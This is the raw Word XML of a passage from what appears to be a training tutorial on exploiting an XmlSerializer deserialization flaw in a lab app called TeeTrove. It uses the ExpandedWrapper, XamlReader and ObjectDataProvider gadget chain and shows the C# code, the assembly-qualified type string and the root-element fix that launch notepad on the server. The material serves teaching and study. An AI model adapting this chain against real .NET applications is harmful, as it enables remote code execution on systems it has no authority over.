    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="67EC4C6B" wp14:textId="47BC004A">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string payload = "&lt;?xml version=\"1.0\"?&gt;&lt;ExpandedWrapperOfXamlReaderObjectDataProvider &lt;SNIP&gt;";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>XmlSerializer xmlSerializer = new XmlSerializer(new ExpandedWrapper&lt;XamlReader, ObjectDataProvider&gt;().GetType());</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>xmlSerializer.Deserialize(new MemoryStream(Encoding.ASCII.GetBytes(payload)));</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="15B5610F" wp14:textId="1145758E">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>With any luck, the calculator should spawn and we should now have a verified payload that we can adapt to work with TeeTrove.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="0822F8A7" wp14:textId="52A1C378">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="3E4CF23A" wp14:anchorId="3A75E121">
            <wp:extent cx="5724524" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="747248104" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R46cd8f0916e945db">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="3409950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="68A797C3" wp14:textId="1B36156C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Exploiting TeeTrove</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6C6B985B" wp14:textId="236A53BB">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>So let's adapt the payload to work with TeeTrove, spawning notepad.exe again instead of the calculator by changing the values of Arguments and FileName. If you remember from earlier in the section, we can control (need to control) the type string which is used when initializing XmlSerializer. The intended value is TeeTrove.Models.Tee, but we need to set it to the string equivalent of new ExpandedWrapper&lt;XamlReader, ObjectDataProvider&gt;().GetType() so that our payload will be deserialized correctly. We can comment out all previous code lines in our program and add the following line:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="2EE1E68F" wp14:textId="72F3585A">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="41FBB902" wp14:textId="5E35F172">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Console.WriteLine(new ExpandedWrapper&lt;XamlReader, ObjectDataProvider&gt;().GetType().ToString());</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="537D1EC2" wp14:textId="6F024CFD">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>To get the following string as output:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="0C8C734A" wp14:textId="77A21229">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="667C9D05" wp14:textId="47246F87">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System.Data.Services.Internal.ExpandedWrapper`2[System.Windows.Markup.XamlReader,System.Windows.Data.ObjectDataProvider]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="06BA5916" wp14:textId="1C70827C">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>But if we supply the combination of this type string and our payload, with dnSpy attached, we get an error because GetType returned null.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="758AD282" wp14:textId="5A2F7B1D">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="7F4683BA" wp14:anchorId="4A4291B5">
            <wp:extent cx="5724524" cy="4162425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="264978335" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rc02f01815db3472c">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="4162425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6A9640B1" wp14:textId="2F6E50AD">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Referring back to the slide from the BlackHat talk, we notice that the type string in the box looks similar to ours, except there are some extra values after the closing ] character that we don't have.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="595A28AC" wp14:textId="0944F579">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="502477E6" wp14:anchorId="0B3210DC">
            <wp:extent cx="5724524" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76555040" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rc8783008b94049fb">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="1276350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6C4F3A4F" wp14:textId="3F32C641">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Luckily this is an easy fix. If we take a look at the </w:t>
      </w:r>
      <w:hyperlink r:id="Ree97fdbd76234048">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Microsoft Documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the Type class, we can see a list of properties including </w:t>
      </w:r>
      <w:hyperlink w:anchor="system-type-assemblyqualifiedname" r:id="R243f68088ea94e15">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>AssemblyQualifiedName</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> which looks more like the string we want. So we can modify our line and specify that we want the AssemblyQualifiedName instead of calling ToString() like this:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="20D1773A" wp14:textId="1A99E097">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="389A657E" wp14:textId="65833598">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Console.WriteLine(new ExpandedWrapper&lt;XamlReader, ObjectDataProvider&gt;().GetType().AssemblyQualifiedName);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="3CCEB4CE" wp14:textId="63E5CD43">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>This time we should get a string that looks closer to the one in the slide:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="35DD7F01" wp14:textId="7010AD6B">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="79291FFB" wp14:textId="0EDB73B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="71BF055F" wp14:textId="76928213">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We can try the exploit again, this time passing the new type string in combination with our payload. Although we don't have the same problem this time, we run into another exception. This time dnSpy says &lt;ExpandedWrapper&lt;SNIP&gt;&gt; was not expected.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="29558B83" wp14:textId="736581AC">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="1A429DDF" wp14:anchorId="1925EB95">
            <wp:extent cx="5724524" cy="2438400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="696351308" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R56db5819a6434fb7">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="2438400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="27014B3C" wp14:textId="6CEEA778">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>What does this mean? Well, let's look at the decompiled code for the Import method one more time.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6C5319D7" wp14:textId="1560E8A8">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="5EE2514D" wp14:anchorId="0DC70BE6">
            <wp:extent cx="5724524" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1428104567" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rfc8c023b48314848">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="3590925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="72BAA548" wp14:textId="099008FE">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>In the screenshot above, we notice another parameter passed when instantiating XmlSerializer, namely an XmlRootAttribute with the name Tee. If we create a new Tee and then export it through the web UI, we also notice that the root element is called Tee.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="28A5C3DE" wp14:textId="7FA0A787">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="551FD3A0" wp14:anchorId="4E70CA31">
            <wp:extent cx="5724524" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51964037" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R6625d831d88449e6">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="2390775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="19520EE8" wp14:textId="481C1017">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>With this in mind, let's try renaming the root element of our payload from ExpandedWrapperOfXamlReaderObjectDataProvider to Tee and resend everything. This time, with Process Explorer open we should see a notepad.exe process spawn as a child of w3wp.exe and so we have our second valid proof of concept for TeeTrove!</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="2DC08235" wp14:textId="6D5D3C14">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="37A36671" wp14:anchorId="214E20B2">
            <wp:extent cx="5724524" cy="4505325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="737038733" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rb91ea20869ee4e00">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="4505325"/>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71755C"/>
    <w:rsid w:val="5171755C"/>
    <w:rsid w:val="641EDD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1755C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2228DB8F-FBD5-4E44-AAA0-972B9DACD2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220d61ab451440f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/dotnet/standard/serialization/introducing-xml-serialization" TargetMode="External" Id="R89d01fa4d497430a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R1147c0214b2b4ad8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R1b78e209558e4357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dnnsoftware.com/" TargetMode="External" Id="R9e7d9d96cb7b4702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization" TargetMode="External" Id="Ref9bcd05ea564003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dnnsoftware/Dnn.Platform/blob/v9.9.1/DNN%20Platform/Library/Common/Utilities/XmlUtils.cs" TargetMode="External" Id="R9c359b7c9ce44942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="Rab555b66b32f45df" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/blog/exploit-dotnetnuke-cookie-deserialization" TargetMode="External" Id="R8b6a13721813476d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf" TargetMode="External" Id="Rc644751488624bee" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R86b5a7851a2c4292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/dotnet/api/system.windows.markup.xamlwriter?view=windowsdesktop-7.0" TargetMode="External" Id="Re403d42e4efa44e4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R3e3052fad06e4481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R8d8cb1ac417b4cf3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="R2b70db5a23bb45a7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 